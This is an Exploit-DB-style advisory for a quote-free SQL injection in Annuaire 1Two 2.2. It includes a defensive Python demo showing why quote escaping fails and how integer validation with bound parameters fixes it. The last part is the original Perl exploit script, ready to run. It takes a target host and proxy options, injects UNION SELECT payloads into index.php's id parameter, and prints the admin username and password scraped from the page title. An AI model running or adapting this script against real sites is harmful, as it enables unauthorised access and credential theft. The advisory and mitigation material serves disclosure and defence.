vendor: Annuaire 1Two 2.2
by: DarkFig
CVSS: 6,5 (MEDIUM)
Type: SQL Injection (without quote)
CWE: 89
Product Name: Annuaire 1Two 2.2
Affected Version From: Annuaire 1Two 2.2
Affected Version To: Annuaire 1Two 2.2
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Annuaire 1Two 2.2 Remote SQL Injection Exploit

This exploit allows an attacker to read the username and password stored in the 1two_annuaire_admin table of the Annuaire 1Two 2.2 application. It sends HTTP GET requests to index.php with the 'id' parameter set to '-1 UNION SELECT username FROM 1two_annuaire_admin' and then to '-1 UNION SELECT password FROM 1two_annuaire_admin'. The payload contains no quote characters (hence "without quote"). The application returns the username and password in the response, where the script reads them from the page title.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
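
Why quote escaping alone does not stop this injection, shown as an added example (not code from Annuaire 1Two or from the exploit author): the 'id' value lands in a numeric context, so the payload needs no quote. The schema, the function names and the table name annuaire_admin are assumptions; SQLite stands in for the application's database and does not accept the page's digit-leading table name unquoted.

```python
import re
import sqlite3

# Constructed payload: the page's UNION string with the stand-in table name.
PAYLOAD = "-1 UNION SELECT username FROM annuaire_admin"

def make_db():
    """In-memory stand-in database with constructed rows."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE entries (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE annuaire_admin (username TEXT, password TEXT);
        INSERT INTO entries VALUES (1, 'Sample listing');
        INSERT INTO annuaire_admin VALUES ('admin', 'constructed-hash');
    """)
    return db

def lookup_escaped(db, raw_id):
    """Weak: quote escaping only, then concatenation into a numeric context."""
    escaped = raw_id.replace("\\", "\\\\").replace("'", "\\'")
    # The payload has no quote or backslash, so escaping leaves it unchanged.
    sql = "SELECT title FROM entries WHERE id = " + escaped
    return [row[0] for row in db.execute(sql)]

def lookup_hardened(db, raw_id):
    """Hardened: accept only a short run of ASCII digits, then bind it."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("id must be a non-negative integer")
    rows = db.execute("SELECT title FROM entries WHERE id = ?", (int(raw_id),))
    return [row[0] for row in rows]

if __name__ == "__main__":
    db = make_db()
    print("escaped, id=1     :", lookup_escaped(db, "1"))
    print("escaped, payload  :", lookup_escaped(db, PAYLOAD))  # leaks a username
    print("hardened, id=1    :", lookup_hardened(db, "1"))
    try:
        lookup_hardened(db, PAYLOAD)
    except ValueError as exc:
        print("hardened, payload : rejected:", exc)
```

The same two steps apply in the application's own language: validate 'id' as an integer, then pass it to the query as a bound parameter instead of concatenating it.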
Source

Exploit-DB raw data:

#!/usr/bin/perl
#
# Affected.scr..: Annuaire 1Two 2.2
# Poc.ID........: 09060902.txt
# Type..........: SQL Injection (without quote)
# Risk.level....: Medium
# Vendor.Status.: Unpatched
# Src.download..: http://www.1two.org/
# Poc.link......: acid-root.new.fr/poc/09060902.txt
# Credits.......: DarkFig
#
#
use LWP::UserAgent;
use HTTP::Request;
use Getopt::Long;
use strict;


print STDOUT "\n+", '-' x 53, "+\n";
print STDOUT "|    Annuaire 1Two 2.2 Remote SQL Injection Exploit   |\n";
print STDOUT '+', '-' x 53, "+\n";

my($host,$path,$proxh,$proxu,$proxp,);
my $opt = GetOptions(
   'host=s'   =>  \$host,
   'path=s'   =>  \$path,
   'proxh=s'  =>  \$proxh,
   'proxu=s'  =>  \$proxu,
   'proxp=s'  =>  \$proxp);
   
if(!$host) {
    print STDOUT "| Usage: ./xx.pl --host=[www] --path=[/] [Options]    |\n";
    print STDOUT "| [Options] --proxh=[ip] --proxu=[user] --proxp=[pwd] |\n";
    print STDOUT '+', '-' x 53, "+\n";
    exit(0);
}

if(!$path) {$path  = '/';}
if($host  !~ /http/) {$host  = 'http://'.$host;}
if($proxh !~ /http/ && $proxh != '') {$proxh = 'http://'.$proxh.'/';}

my @fi = ('username', 'password');
my $ur = $host.$path.'index.php?id=';
my $ua = LWP::UserAgent->new();
   $ua->agent('Mozilla XD');
   $ua->timeout(30);
   $ua->proxy(['http'] => $proxh) if $proxh;

foreach(@fi) {
my $xx = $_;
my $re = HTTP::Request->new(GET =>  $ur."-1 UNION SELECT $xx FROM 1two_annuaire_admin");
   $re->proxy_authorization_basic($proxu, $proxp) if $proxp;
my $xd = $ua->request($re);
my $da = $xd->content;

if($da =~ /- (.*?)<\/title>/) {
      if($xx eq 'username') {
            print STDOUT " [+]User:";}
      if($xx eq 'password') {
            print STDOUT " [+]Passwd:";}
      print STDOUT " $1\n";
} else {
  print STDOUT "[!]Exploit failed\n";
}}
print STDOUT "+", '-' x 53, "+\n";
exit(0);

# milw0rm.com [2006-09-02]